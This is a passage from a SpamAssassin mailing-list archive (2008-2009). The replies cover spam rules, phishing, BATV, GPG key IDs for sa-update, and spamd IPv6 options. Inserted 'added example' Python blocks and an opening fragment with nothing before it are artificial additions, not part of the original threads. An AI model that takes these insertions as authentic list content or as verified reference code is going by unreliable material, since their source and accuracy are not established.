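To feed SpamAssassin's regular body rules rather than the patterns above, append the rendered text as an extra text/plain part before handing the message to spamc, which is the "render the content before passing the modified message" step in the reply. Treat the converter as untrusted code running on attacker-supplied input; a sandboxed process is the right place for a real .doc or PDF renderer.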
Re: Unsubscribe
At 06:43 12-06-2009, Michael Scheidell wrote:
> SA mailing list folks: you might want to include both automatically in the footer of your emails. Yes, they will break dkim signing for many people, but maybe we should lead by example.

The people that footer is intended for won't read it anyway.

Regards,
-sm
RE: Odd behaviour under load.
Hi John,

At 06:50 08-05-2009, John Hardin wrote:
> I suspect the sender is timing out waiting for the 250 OK after sending the message, hence my (humorous) "100 Please hold..." suggestion. (Jeeze, SM, lighten up!)

There has already been such a proposal. Someone might take your humorous suggestion seriously, hence my comment.

Regards,
-sm
Re: Odd behaviour under load.
At 13:15 07-05-2009, John Hardin wrote:
> Heh. Does the SMTP protocol need a "100 Please hold..." reply?

No. Fix the mail server instead of the protocol.

Regards,
-sm
Re: emailBL
At 14:54 27-04-2009, David B Funk wrote:
> On Mon, 27 Apr 2009, John Hardin wrote:
>> How about _at_ - I think a leading and trailing underscore will be very rare in real world domain name parts, especially as you can't register a domain name having an underscore, and many apps will discard hostnames with underscores as invalid.
>
> Ever seen a MicroSoft AD SRV dns query? Try something like:
>
>   _gc._tcp.Default-First-Site._sites.win.ccad.uiowa.edu.
>
> Haven't seen one that contains leading and trailing underscores, -yet-.

The previous comment was about hostnames. An underscore is not a valid character for a hostname. The example you gave is not a hostname.

Regards,
-sm
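The distinction the reply makes, between a hostname (RFC 952/1123: letters, digits, hyphens) and a DNS owner name (which may carry labels like _tcp), as an added example that is not part of the thread. The emailBL query encoding using the _at_ separator is hypothetical, built only to illustrate the argument in the quoted exchange; the list under discussion may encode addresses differently (hashing them, for instance), and the zone name is a placeholder.

```python
import re

HOSTNAME_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def is_hostname(name):
    """RFC 952/1123 host name: letters, digits and hyphens only, no label
    starting or ending with a hyphen, at most 63 octets per label and 253 overall."""
    name = name.rstrip(".")
    if not name or len(name) > 253:
        return False
    return all(HOSTNAME_LABEL.match(label) for label in name.split("."))


def is_dns_name(name):
    """A DNS owner name is looser: any label of 1..63 characters is permitted,
    which is why SRV (_tcp) and DKIM selector (_domainkey) names are legal."""
    name = name.rstrip(".")
    return 0 < len(name) <= 253 and all(0 < len(l) <= 63 for l in name.split("."))


def emailbl_query_name(address, zone):
    """Hypothetical emailBL query name: local_at_domain.<zone>.

    Because '_' never appears in a valid hostname, the _at_ token cannot
    collide with a label of the sender's domain, even though the local part
    may itself contain dots (john.doe) or underscores.
    """
    local, _, domain = address.lower().rpartition("@")
    if not local or not is_hostname(domain):
        raise ValueError("not a plain mailbox address: %r" % address)
    return "%s_at_%s.%s" % (local, domain, zone)


def emailbl_decode(qname, zone):
    """Inverse of emailbl_query_name. Splitting at the LAST _at_ is safe
    because the domain side is a hostname and cannot contain an underscore."""
    suffix = "." + zone
    if not qname.endswith(suffix):
        raise ValueError("query is not under the zone")
    local, sep, domain = qname[:-len(suffix)].rpartition("_at_")
    if not sep:
        raise ValueError("no _at_ separator in query name")
    return local + "@" + domain
```

The SRV name from the thread passes is_dns_name and fails is_hostname, which is the reply's point: it is a perfectly good DNS name that no host will ever present in HELO or in an address's domain part.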
Re: Another bad kind of spams, for Pfizer knockoffs with image
At 13:12 24-04-2009, Igor Chudov wrote:
> I get plenty of these also, and cannot get them to score well. These advertise knockoffs of bestselling Pfizer products. The text is meaningless garbage text. The sales message is contained in a PNG image, but it could be other image types like jpeg.

The following rule may help. You'll need the ImageInfo plugin.

  body PNG_200_400 eval:image_size_range('png', 200, 400, 250, 450)
  describe PNG_200_400 Contains png 200-250 x 400-450
  score PNG_200_400 0.1

Adjust the score to fit your needs.

Regards,
-sm
Re: Phishing
At 17:05 24-04-2009, Casartello, Thomas wrote:
> One major issue we've been having lately is with phishing emails being targeted at us. They're being sent to us from hacked accounts at other educational institutes. The message usually is about "Your EDU webmail account is expiring. Please send us your username and password to fix it." We've had some users fall for it, then their Exchange account gets turned into a spam machine (sending out usual junk spam as well as the original phishing message.) Because they are coming from legitimate sites, it's been very difficult to block these messages. I've been trying to write phrase rules with common words used in the message, but whoever's responsible for this is continually changing the message to prevent you from being able to catch them with phrase rules. Any thoughts?

There was a project from an educational institution to target phishing emails. I don't recall the name of the project or whether the source code was released.

It is going to be a lot of work to keep the rules updated to catch these emails. Analyze the emails instead of trying to apply the usual techniques to catch them. Instead of considering the emails as coming from legitimate sites, you should treat that as a data point as part of the patterns to identify. The words in the emails might change but the sender relies on some information for the phish to work. You should be able to parse the mail traffic for that information.

BTW, there is a larger problem if there are hacked accounts available on the sending network and on your network.

Regards,
-sm
Re: emailreg.org (was: zen.spamhaus.org)
At 01:19 10-04-2009, Ralf Hildebrandt wrote:
> They could simply offer free registration for old domains...

They could. I doubt that someone running such a service would do that if people are willing to pay.

At 04:52 10-04-2009, Rob McEwen wrote:
> I don't understand your last sentence above. It seems to make no sense.

I'll clarify off-list.

> EXCEPT TO STATE: Who knows much of anything for absolute certain about this situation? For example, it is entirely within the realm of possibility that emailreg.org is a separate non-commercial and non-profit organization (as the .org seems to imply?). And maybe emailreg.org really is a separate entity from Barracuda (as the

I don't see any difference in the usage of .org instead of .com as there are commercial organizations that use it.

> AND EXCEPT TO ASK: Is that $20 fee a one-time fee? Or a yearly fee? Or, does it have any kind of expiration date?

Who knows? It will be interesting to see whether the rules are included in a SpamAssassin distribution.

Regards,
-sm
emailreg.org (was: zen.spamhaus.org)
Hi Rob,

At 12:52 07-04-2009, Rob McEwen wrote:
> I had no idea that emailreg.org was owned and operated by Barracuda. I

http://www.barracudacentral.org/about/emailreg
http://www.emailreg.org/index.cgi?p=about

> But, as the post you mentioned said, emailreg.org resolves to 64.235.146.64 and arin.net shows that 64.235.146.64 is clearly in Barracuda's assigned address space. I'll tell you right now... this is BIG and EASY money. Very BIG and very EASY money. I suspect they are pulling in hundreds... maybe even thousands... of those $20 payments per day.

The usage policy at http://www.emailreg.org/index.cgi?p=policy mentions that there is a $20 registration fee to discourage "domain tasters" from sending spam and to further verify the contact information.

> (if I seem upset about this... read between the lines... and you might understand why)

Are you upset because people are paying money to a site with a domain owner hidden by the Whois privacy registration? :-) Some antispam offers are big and easy money as there's always somebody ready to pay or to jump on the bandwagon because it is free.

Regards,
-sm
Re: Ways to block bouncebacks?
At 02:59 05-04-2009, Jeremy Morton wrote:
> Well, as far as I can tell from that document, SRS is great at saying, yep, this is a legit bounce message. But, if SRS says it doesn't seem to be, aren't you rather back at square 1? A message that looks like a regular e-mail, doesn't really have any spam

You can use BATV. You must then submit all messages for the domain through a mail server that supports BATV.

Regards,
-sm
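How the BATV approach in the reply answers the "back at square one" worry, as an added example that is not part of the thread and not any MTA's BATV implementation: every MAIL FROM the domain sends is rewritten to the prvs= form from the BATV draft (key digit, three-digit expiry day, six hex digits of a MAC), so a bounce addressed to a plain, untagged local part was never a reply to mail we sent and can be rejected at RCPT TO without looking at its content. The key, the day in the demo and the exact bytes fed to the HMAC are this example's own choices; the draft leaves the MAC input to the signing domain because only that domain ever verifies its own tags.

```python
import datetime
import hashlib
import hmac
import re

PRVS_RE = re.compile(r"^prvs=(\d)(\d{3})([0-9a-f]{6})=(.+)$", re.I)
SAMPLE_DAY = datetime.date(2009, 4, 5)          # fixed day so the demo is reproducible


def day_offset(day, n):
    return day + datetime.timedelta(days=n)


def _tag(key, key_id, ddd, loc_core, domain):
    # Six hex digits of HMAC-SHA1 over key id, expiry day and the original
    # address. Assumed layout of the MAC input (see lead-in); the output layout
    # K DDD SSSSSS follows the BATV prvs scheme.
    data = ("%d%03d%s@%s" % (key_id, ddd, loc_core, domain)).encode()
    return hmac.new(key, data, hashlib.sha1).hexdigest()[:6]


def prvs_sign(address, key, key_id=0, valid_days=7, today=None):
    """Rewrite MAIL FROM local@domain as prvs=KDDDSSSSSS=local@domain."""
    today = today or datetime.date.today()
    loc_core, _, domain = address.rpartition("@")
    ddd = (today.toordinal() + valid_days) % 1000   # expiry day, modulo 1000
    tag = _tag(key, key_id, ddd, loc_core, domain)
    return "prvs=%d%03d%s=%s@%s" % (key_id, ddd, tag, loc_core, domain)


def prvs_verify(address, keys, valid_days=7, today=None):
    """Check the RCPT TO of an incoming bounce. Returns (ok, reason, original).

    keys maps key id -> secret, so keys can be rotated while tags signed with
    the previous key are still within their validity window.
    """
    today = today or datetime.date.today()
    local, _, domain = address.rpartition("@")
    m = PRVS_RE.match(local)
    if not m:
        return False, "untagged: not a reply to mail we sent", None
    key_id, ddd, tag, loc_core = int(m.group(1)), int(m.group(2)), m.group(3).lower(), m.group(4)
    key = keys.get(key_id)
    if key is None:
        return False, "unknown key id", None
    expected = _tag(key, key_id, ddd, loc_core, domain)
    if not hmac.compare_digest(expected, tag):       # constant-time comparison
        return False, "bad signature", None
    remaining = (ddd - today.toordinal()) % 1000      # days until expiry, wraps at 1000
    if remaining > valid_days:
        return False, "expired", None
    return True, "ok", "%s@%s" % (loc_core, domain)
```

Deployment note, matching the reply's caveat: the check only works if every message for the domain leaves through a server that applies prvs_sign, otherwise legitimate bounces to the untagged address would be refused. Bounces to tagged addresses still need the usual handling once they pass; BATV only filters out the forged ones.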
Re: Suddenly bouncing emails
At 07:46 23-03-2009, klowther wrote:
> I started suddenly getting lots of bounces. I'm using the latest Mandriva. I have traced it down to EVERY email getting points from URIBL and SURBL. I checked one list on SURBL and it isn't listed. I guess I need to know how to fix/disable this module? As far as I can tell EVERY email is getting the exact same score added to it. Thanks.
>
>       URIBL_GREY Contains an URL listed in the URIBL greylist [URIs: mod_frontpage.so]
>   2.0 URIBL_BLACK Contains an URL listed in the URIBL blacklist [URIs: mod_frontpage.so]
>   2.0 URIBL_PH_SURBL Contains an URL listed in the PH SURBL blocklist

Do a DNS test for a non-existent hostname. If you receive an answer, switch to a name server (you can run one locally) that provides genuine replies.

Regards,
-sm
Re: efax sends it own phishing email.? or java script I can't decode?
At 05:02 21-03-2009, Michael Scheidell wrote:
> client got an html email (which was scored really high) due to the 'unable to obtain payment from your credit card' with a link to their web site where they advised client to log in and enter in new credit card information. neat (useless?) java script in email:

There isn't any Javascript in the email.

> initially I suspected it as just another phishing email, but best I can tell (unless there is some neat java stuff in the email), headers, typical phishing email designed to trick the gullible into putting in their credit card info), but I can't tell why this ISN'T efax's web site in the link:
>
> Here are some convenient options for resolving this situation:

This isn't a phishing email. There is an eFax web site in the link. If we are unable to collect payment from your credit card, we have to inform the customer. That is usually done by email.

Regards,
-sm
Re: Dealing with low scoring spam - tighter MTA integration [was: 2 + 2 != 4 - Spamassassin needs a new paradigm]
At 07:02 04-03-2009, Andrzej Adam Filip wrote:
> Maybe SpamAssassin should create a set of tests intended for use before replying to RCPT TO: in an SMTP session? [ test based on: sending IP address, envelope sender, envelope recipient, and name in helo/ehlo ]
SpamAssassin processes the message and returns the result. The way it is designed, it can be integrated in different environments as it is MTA agnostic. The change you propose could be done by introducing a new command in the protocol to evaluate the envelope information only. It would be easier to do all that through a milter as there is less overhead. The downside is that you will get more false positives.
Regards, -sm
Re: ReturnPath, Habeas, BondedSender
At 17:20 02-03-2009, J.D. Falk wrote:
> (BTW, a quick visit to your favorite search engine should alleviate any fears that either Neil or I are marketers.)
I can confirm that J.D. is not in marketing. He did not top-post or send his message in HTML format. :-)
Regards, -sm
Re: How to disable DNSWL?
At 04:25 03-03-2009, Michelle Konzack wrote:
> The network in my enterprise is *.private.tamay-dogan.net and the outgoing mailserver mail.private.tamay-dogan.net which is correctly configured and of course, not accessible from outside the world. Hence, I am sending messages over the relay server7.pinguin-hosting.de from my hosting provider. Now, nearly each 6th E-Mail from me comes back as bounce since they all tell me, spamassassin is thinking I have a trojan/bot in my network.
Being listed in ZEN does not necessarily mean that the host has a trojan or bot.
> This spamassassin setup is definitively crap, because if you look in the header of any of my messages, you see, I am a legitimate authenticated sender.
The headers of your message are correct. Using ZEN for all IP addresses listed in the headers will result in incorrect hits. Post the headers and the rules that message hit.
Regards, -sm
Re: Something doofuzzled in a * ^To: line.
At 18:38 23-02-2009, Gene Heskett wrote:
> The input line looks like this:
> To: unlisted-recipients:; (no To-header on input)@gmail-pop.l.google.com
Is your MTA or POP3 client adding the @gmail-pop.l.google.com at the end of that line? You could add a rule to catch the "no To-header" comment.
Regards, -sm
Re: Something doofuzzled in a * ^To: line.
At 22:08 23-02-2009, Gene Heskett wrote:
> Not that I know of. Fetchmail occasionally squawks about a race in the PEEK_MSG function, maybe a couple times a day. ~/.procmailrc has no such edit line in it. Obviously it did come in through my gmail account.
The MSG_PEEK is used on sockets and that's where the race condition occurs.
> Humm, if it can't find the unlisted stuff in the same line...
Your software may have added a line wrap.
:0:
* ^.*no To-header on input
/dev/null
I haven't tested that recipe. It should work. You can enable the Procmail log file for debugging.
Regards, -sm
Re: HELO checks give too high score together
At 23:16 21-02-2009, Benny Pedersen wrote:
> why does an SMTP server have a dynamic hostname alike in the first place?
What is a dynamic hostname?
Regards, -sm
Re: HELO checks give too high score together
At 01:20 22-02-2009, Benny Pedersen wrote:
> you don't know it either?
The term dynamic hostname is used in intermediate system routing.
Regards, -sm
Re: Error ''connect to spamd on 127.0.0.1 failed, retrying (# 1 of 3): Connection timed out ''
At 15:16 16-02-2009, Kalil Costa - Brasilsite wrote:
> Next, I have a full qmailtoaster (qmail, Vpopmail, simscan, clamav, spamassassin, etc.) and the following error occurs in maillog:
> connect to spamd on 127.0.0.1 failed, retrying (# 1 of 3): Connection timed out
Based on the error message, spamd is not listening on localhost.
Regards, -sm
Re: Filtering/ blocking forged emails
At 12:52 06-02-2009, Nandini Mocherla wrote:
> I am new to postfix/SpamAssassin and thinking of a way to block email addresses which do not come from that domain. For example, if someone with a @xxx.com email sends to a list it must come from a server in the xxx.com domain else it should be rejected. Is it possible to do this? As there is every possibility that spammers can also send with real
That's similar to SPF. You can configure Postfix to block these messages through policyd or a milter.
> user's id and I am planning to have a check that would be able to compare the From: and the Message-Id domains to check for spoofed messages coming in from an open relay. It's just an idea to eliminate every possible attack. As I don't have much experience with
There isn't any correlation between the domain part of the address used in the From: and what appears in the Message-ID.
> postfix, just installed/configured a couple of days ago, any suggestions in this regard will be highly helpful for me. I have also read somewhere about Sender Score Certified support in SpamAssassin. But not sure how this works? Will it check the sender's from address and compare it with the domain?
There are three RCVD_IN_BSP_ rules for that.
Regards, -sm
Re: Filtering/ blocking forged emails
At 13:10 06-02-2009, Michael Scheidell wrote:
> (ps, someone has a FP on whois_contactpriv) Doesn't look like apache or espphotograpy.com or dslextreme.com
It's not a false positive. There was xxx.com in the message.
Regards, -sm
RE: country in africa
At 22:39 30-01-2009, RobertH wrote:
> when an email comes in with the word nigeria in it, it should get scored something.
You could score the content if it mentions a country in Africa. We then have to obfuscate the words so that we can mention them on this mailing list. It's better to use Bayes to deal with that type of email.
Regards, -sm
RE: country in africa
At 08:18 31-01-2009, RobertH wrote:
> and if i understand correctly, you can tell the SA config not to
> bayes_ignore_from *...@spamassassin.apache.org
> bayes_ignore_to users@spamassassin.apache.org
Right. There are still some subscribers who don't realize that some of the messages from this mailing list will trigger their antispam filters as the discussion is generally about spam.
Regards, -sm
Re: Bayesian per domain filtering
At 12:46 18-01-2009, Munroe Sollog wrote:
> I am sure this has been asked before, however, I cannot find any clear documentation nor archives addressing this question. I would like to store a per domain bayesdb, preferably in a database. Is there documentation on doing this?
No. You would have to patch the code to do that.
Regards, -sm
RE: Temporary 'Replacements' for SaneSecurity
At 01:36 15-01-2009, Rasmus Haslund wrote:
> implement it with the SA engine running in Icewarp Merak. Anyway we do have a lot of problems with FP when we try out new things and I just have to say some things just do not work well on a large scale where you have to deal with all kinds of languages from all over the world.
Antispam tools rarely work well on a large scale. SpamAssassin has not been tested with all the different languages. You have to do your own testing and make adjustments.
> We do business with tons of companies that are using some cheap/free mailserver on their dsl line and then that's it - these are listed in PBL and god knows where... but if we don't get their email through it will mean large amounts of lost revenue. I constantly have to be over the system looking to see what new trends arise. Thankfully our system in
There are a few people that do that as they understand that filtering requires continuous management. SpamAssassin can be quite effective even if you are communicating with companies running mail servers on their DSL line. It is commonly said around here that SpamAssassin does not block spam. The score it generates can be used to categorize the emails you receive. From there, you can block the really bad and flag what falls in between for review. One of the advantages of SpamAssassin is that it won't flag an email as spam on the basis of a PBL listing only.
> blocked though no explanation from them) and 2nd some customers mailserver and I'm not sure how they fixed it since they don't speak any language I can understand or speak so our sales rep. for them translated a bunch of stuff from me and now it seems ok.
That's one of the problems when you communicate globally. If you are seeing a lot of false positives, post some samples on a web site together with the rules that were hit.
Regards, -sm
Re: Temporary 'Replacements' for SaneSecurity
At 06:59 14-01-2009, Rob McEwen wrote:
> Because Rasmus manages a mail server where B2B mail is routinely sent/received _globally_, Rasmus is the king of finding FPs. I could be wrong, but judging from previous reports about the Botnet Plugin, I predict that Rasmus will either (a) find the Botnet Plugin utterly unusable due to FPs, or (b) only be able to score it by a point or two due to excessive FPs. (Rasmus--by all means--please don't take my word for it--try it out and then let us know what happened!)
Botnet Plugin sounds like a plugin that detects botnets ... If Rasmus is finding that many false positives, then he's using the wrong tools.
At 08:37 14-01-2009, Matt Garretson wrote:
> Is there any way that a more distributed method of delivering updates could be more resistant to DDOS attacks? E.g. trackerless bittorrents (DHT), or something along those lines?
Isn't that technology certified for illegal content only? :-) Sanesecurity could have been better protected against DDOS attacks. They are a ripe target.
Regards, -sm
Re: Temporary 'Replacements' for SaneSecurity
At 12:44 14-01-2009, Rob McEwen wrote:
> No. This is just due to the fact that, unfortunately, some mail servers and IPs (which send desired and solicited messages) are somewhat incorrectly configured. It turns out that a distributor receiving legitimate business e-mail from vendors customers in such places as Africa, South America, Asia... all over the place... is going to see a disproportionately larger amount of messages sent from IPs which either:
Choosing a tool requires an understanding of what the tool can do and the task to be performed with it. We don't have to go as far as South America to find incorrectly configured mail servers. There's currently a user on this list running one that sends bounces to the wrong address.
> This has nothing to do with Rasmus's tools.. other than the fact that (I surmise) he is probably now forced, given that situation, to back off of his scoring of DNSBLs and rely more on content filtering in comparison to those whose e-mail is mostly US/Europe-based.
If there is nothing wrong with Rasmus' tools, then the Botnet plugin should work for him. Now, if you are saying that the Botnet plugin should only be used for those of you who only receive mail from the US or Europe, I'll point out that it also causes false positives for that kind of mail traffic. As you mentioned above, the problem is not really with the Botnet plugin if we understand that it does not detect botnets.
Regards, -sm
Eudora content concentrator (was: Whitelist not working - Ugh please help)
At 22:01 08-01-2009, Evan Platt wrote:
> Ok, unless someone here knows, I'll ask in an Eudora group... I turned Header mode to Terse. Only shows the From, To, and subject headers. But also trims the heck out of the message. If there's a few pages of quoted text, it shows ...snip and for some reason, removes odd things, like in this case, the Nabble tag. Any ideas?
The Content Concentrator replaces excessive text in the message body with snip if you use Terse mode. The footer is part of the excessive text being hidden. You can use Compact mode to reduce the effect. If you want to hide the headers only, you can use the TabooHeaders setting.
Regards, -sm
Re: Whitelist not working - Ugh please help
At 18:40 08-01-2009, Evan Platt wrote:
> For the THIRD time, SpamAssassin is not marking the mail as Spam. Mailscanner is. You need to ask on a mailscanner list.
The footer at the bottom of the original message is a hint as to why your advice won't be understood. :-)
Regards, -sm
Re: A lot of spams go through, see example
At 11:06 26-12-2008, Igor Chudov wrote:
> http://igor.chudov.com/tmp/spam005.txt
> I get a lot of these, all seemingly sent by the same software and the same person, any way of filtering them out?
Autolearning is categorizing that email as ham because of the zero score. Turn off autolearning or reduce the score for autolearning ham until you fix this problem. As a quick fix, add a header rule to catch the FreeCreditReports360.com in the From header.
Regards, -sm
Re: [OT] GPG Signatures
At 00:55 15-12-2008, Arthur Dent wrote:
> I have had quite a lot of trouble getting my posts through to mailing lists (this one and others) lately. More often than not they simply never appear which makes me wonder if there is something wrong with my mail set-up (I would be grateful if someone could look at this one and let me know if I am triggering any rules...)
What does the reject message say?
> Then today I received a bounceback message from a member of this list to a message I posted (successfully) 9 days ago. The gist of the bounceback is that my GPG signature was considered unsafe. Now, I routinely sign my messages (not this one!) because I think it is good practice, but could this be at least part of the reason why my mail doesn't get through?
No. There is a subscriber rewriting the recipient address to an invalid one. The bounces are incorrectly sent to the author of the message instead of the sender.
Regards, -sm
Re: Preemptive URI blocklisting
At 08:11 14-12-2008, Dave Pooser wrote:
> %word%%otherword%.com format and both are in the same /24. So I started checking PTR records for the whole /24 and I'm seeing snowshoe farms like this (mildly borked to not hit URI lists):
> 3.193.111.66.in-addr.arpa name = dancethree[dot]com.
Verify the registrant information available from Whois and see whether such domains regularly appear in spam or ham.
Regards, -sm
Re: sought rules updates
At 22:19 10-12-2008, LuKreme wrote:
> I ssh to the server and then I sudo su (so I am sure I have discarded my own login environment, I do not normally do this)
> mail# gpg --list-keys /etc/mail/spamassassin/sa-update-keys/pubring.gpg
> gpg: error reading key: No public key
gpg --no-default-keyring --keyring /etc/mail/spamassassin/sa-update-keys/pubring.gpg
> At least on my FreeBSD, there's no man page for gpg, and the --help
man gpg works for me.
> Riiight, but the public key I put in the keychain does all that, no? I'm still unclear on how the --gpgkey makes it more secure. If the file is signed, the signature is checked against the public key that I have in pubring.gpg. What does the gpgkey do?
There may be several keys in a keyring. When running an automated process to verify a file, you also have to validate who signed the file. That's where the gpgkey comes in. Simply checking the signature is not enough.
Regards, -sm
Re: sought rules updates
At 13:51 10-12-2008, LuKreme wrote:
> I read the man page, where there is no mention of how to obtain this number. In fact, I read many posts, and many webpages and have still not found that information. I've seen the IDs in others posts, sure, but where do they originate?
sa-update uses GPG (GNU Privacy Guard) to verify the authenticity of the updates. The Sought rules webpage mentions how to download the GPG key. If you want to understand how GPG works or how to use GPG keys, you should read the GPG documentation.
> Even searching the wiki (which just links to the previously linked http://taint.org/2007/08/15/004348a.html ) is merely a "here's the random-looking digits you pass to --gpgkey" and not a "here's what the --gpgkey is, means, and how it's generated".
The gpgkey parameter for sa-update specifies which GPG key ID should be trusted to sign the updates. You can use the gpg command to find out what the key ID is. That's not a random number; it's a hexadecimal number which identifies the key.
> Why doesn't sa-learn simply trust the keys that are added to its keychain without this extra (and at least for me, confusing) step? I'm starting to think the simplest way to do this is just ignore the gpg flags entirely and use --nogpg. What's the downside to this (other than the obvious DNS hijacking to point the URL to some spammer site with bad data which seems a remote enough chance to ignore).
Because sa-update is designed to provide updates in a secure way. If you want the simplest way, you can ignore these steps and face the consequences when something goes wrong.
Regards, -sm
Re: sought rules updates
At 20:39 10-12-2008, LuKreme wrote:
> And the source of that number is, evidently, a complete mystery. That's my point. I've seen lots of instructions like this:
> # wget http://somesite.tld/somepath/GPG.KEY
> # sudo sa-update --import GPG.KEY
> # sudo sa-update --gpgkey 0E28B3DC --channel uber.rule.somesite.tld
> where the '0E28B3DC' has just magically appeared as if created from the ether.
Once you have imported the key, you can use gpg --list-keys to find the key ID.
> Do you see that there is a crucial step missing there?
Yes.
> Where did that gpgkey value come from? If it wasn't provided in these instructions (like say you were looking for a ruleset at foo.bar.tld/GPG.KEY but hadn't yet discovered the page that had the magic hex code), how do you find it? Can you generate it? Is it simply a hash of the gpg keyfile, or something else?
The key ID is the low order 64 bits of the fingerprint.
> It's a bit of "hey, now just fill in this number we hopefully have given you. Don't worry about what it means, or how it works, or where it came from. Just copypaste and you'll be fine." Strangely enough, that does not fill me with the highest degree of confidence. Not much more so than --nogpg.
That's not the right way to do it if we are concerned about trust relationships. As you said, unless you have confidence in what is published on the webpage, it's like running sa-update with the --nogpg parameter.
> gpgkey. I've added the key to the keychain as a trusted key, that is enough to make it secure. How is this 8 digit hex code making anything any more secure?
By adding the key to the keychain, you are trusting it. The security part is that you can verify whether the signer generated the updates. Even if the host is compromised, you are safe as long as the private key is secure and the signer still has your trust.
Regards, -sm
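The three sa-update messages above keep circling back to where the --gpgkey value comes from. The following is an added example (not code from sa-update or GnuPG): it builds a constructed OpenPGP v4 RSA public key packet, computes its fingerprint as RFC 4880 section 12.2 defines it, and shows that the 16-digit key ID is the low-order 64 bits of that fingerprint and the 8-digit form seen in --gpgkey examples is the low-order 32 bits. The key material and timestamp are toy values, and signer_is_trusted is a hypothetical helper illustrating the extra check that "the signature verified" alone does not give you.

```python
"""Derive an OpenPGP v4 fingerprint and the short/long key IDs from a key packet.

Added example; not code from sa-update or GnuPG. The key material below is a
constructed toy value (not a real key) so the script runs offline.
"""
import hashlib
import struct


def mpi(value: int) -> bytes:
    """Encode an integer as an OpenPGP multiprecision integer (RFC 4880 3.2):
    two-byte big-endian bit count followed by the big-endian magnitude."""
    bits = value.bit_length()
    return struct.pack(">H", bits) + value.to_bytes((bits + 7) // 8, "big")


def rsa_public_key_packet_body(n: int, e: int, created: int) -> bytes:
    """Body of a version 4 public key packet for RSA (RFC 4880 5.5.2):
    version byte, creation time, algorithm id 1 (RSA), then MPIs n and e."""
    return b"\x04" + struct.pack(">I", created) + b"\x01" + mpi(n) + mpi(e)


def v4_fingerprint(body: bytes) -> str:
    """RFC 4880 12.2: SHA-1 over 0x99, the two-byte body length, and the body.
    Returned as 40 upper-case hex digits, the form gpg --fingerprint prints."""
    hashed = b"\x99" + struct.pack(">H", len(body)) + body
    return hashlib.sha1(hashed).hexdigest().upper()


def long_key_id(fingerprint: str) -> str:
    """The key ID is the low-order 64 bits of the fingerprint (16 hex digits)."""
    return fingerprint[-16:]


def short_key_id(fingerprint: str) -> str:
    """The 8-digit form seen in --gpgkey examples is the low-order 32 bits."""
    return fingerprint[-8:]


def signer_is_trusted(signer_fingerprint: str, configured_gpgkey: str) -> bool:
    """Hypothetical helper: what a --gpgkey style check adds on top of a
    successful signature verification. A keyring may hold several keys, so
    the signing key's fingerprint must also end with the ID the administrator
    configured. Accepts 8, 16 or 40 hex digits, optionally prefixed with 0x."""
    wanted = configured_gpgkey.strip().upper().replace(" ", "")
    if wanted.startswith("0X"):
        wanted = wanted[2:]
    if len(wanted) not in (8, 16, 40):
        return False
    return signer_fingerprint.upper().endswith(wanted)


# Constructed toy key: a tiny "modulus" and the usual exponent 65537.
# Real keys are far larger; the fingerprint arithmetic is identical.
TOY_N = 0xC0FFEE1234567890ABCDEF
TOY_E = 65537
TOY_CREATED = 1228000000  # constructed timestamp (seconds since the epoch)
TOY_BODY = rsa_public_key_packet_body(TOY_N, TOY_E, TOY_CREATED)
TOY_FPR = v4_fingerprint(TOY_BODY)

if __name__ == "__main__":
    print("fingerprint :", TOY_FPR)
    print("long key ID :", long_key_id(TOY_FPR))
    print("short key ID:", short_key_id(TOY_FPR))  # the --gpgkey style value
    print("trusted?    :", signer_is_trusted(TOY_FPR, short_key_id(TOY_FPR)))
```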
Re: [sa-list] Re: [sa-list] Re: Spamd and ipv6
At 18:23 02-12-2008, Byung-Hee HWANG wrote:
> Are you using FreeBSD or NetBSD? If so, i understand you. Unfortunately, SA developers do not care about IPv6 yet. So here SA program at first do action with 127.0.0.1 than ::1, i guess ;;
This was tested on a BSD system. SpamAssassin developers are sharing their code for free. If we need a specific feature or find a bug, we can always send a patch. If you read the URL I posted previously, you will see that the developers have been working on IPv6 support.
Regards, -sm
Re: I'm thinking about offering a free MX backup service
At 11:51 02-12-2008, Marc Perkel wrote:
> Tell me if you think this is a good idea.
Everything that helps to promote your business is a good idea. :-)
Regards, -sm
Re: [sa-list] Re: Spamd and ipv6
At 23:01 30-11-2008, Dan Mahoney, System Admin wrote:
> So then, you're saying the behavior for ipv4 and ipv6 is somehow different?
If you start spamd without specifying the IP addresses to listen on, spamd will listen on the 127.0.0.1 IP address only. You should have the IO::Socket::INET6 and Socket6 Perl modules installed to have IPv6 support in spamd. You can start spamd as follows:
spamd -i 2001:DB8:1:1::1
spamd only allows connections from 127.0.0.1. You can allow connections from other IP addresses with the -A parameter. You may have to patch Mail::SpamAssassin::NetSet. See https://issues.apache.org/SpamAssassin/show_bug.cgi?id=4964
> Additionally, even when I get this working, I am unable to specify ipv6 addresses to -A, either with or without square brackets.
That part of the code is IPv4 specific.
Regards, -sm
Re: [sa-list] Re: [sa-list] Re: Spamd and ipv6
At 07:03 01-12-2008, Dan Mahoney, System Admin wrote:
> And on an ip6 enabled system, where will spamc localhost try to connect to first? 127.0.0.1 or ::1?
By default, spamc connects to 127.0.0.1. On a properly configured network, it will try ::1, then 127.0.0.1.
> Yes, but there's no way to listen on *both* addresses -- however, it's completely possible to listen on all ip4 addresses -- I'm just looking for a switch that will say all ip4 AND all ip6.
There isn't a switch for all IPv4 and all IPv6 addresses.
> Also, it would be useful if I could specify to listen on :: or [::] (neither worked when I tried it.) Again, consistent behavior between v4 and v6 is what I'm looking for.
If you specify the listen on address as ::, spamd will listen on all IPv6 addresses.
> Listening on v6 is pointless if I can't restrict. Is the correct answer to open another bug? Or from these commit messages, should I simply assume the next 3.3 will have these (I see jm's note that the patches shouldn't cleanly apply to 3.2.x.)?
It's actually restricted. If you don't specify an IP address with -A, spamd will disconnect you. You won't be able to specify IPv6 addresses after the -A without the patch. You can either wait for 3.3 to be released or adapt that patch for your version of SpamAssassin.
Regards, -sm
Re: Spamd and ipv6
At 21:45 30-11-2008, Dan Mahoney, System Admin wrote:
> Since getting my hosts natively speaking ipv6, I've been seeing a lot of initial timeouts connecting to spamc, because I believe it's apparently trying ipv6 first.
> spamc: connect to spamd on 2001:470:1f07:a7f::1 failed, retrying (#1 of 3): Connection refused
> [snip]
> However, I cannot get the -A syntax for spamd to accept connections from a given address, nor does it appear to be listening on said address:
> quark# netstat -na | grep LIST | grep 783
> tcp4 0 0 *.783 *.* LISTEN
Use the -i parameter to specify the IPv6 address. The -A parameter specifies the host which can connect to spamd, not the IP address on which spamd should listen.
Regards, -sm
Re: IPv6 only sa-update channels?
At 19:30 28-11-2008, Daryl C. W. O'Shea wrote:
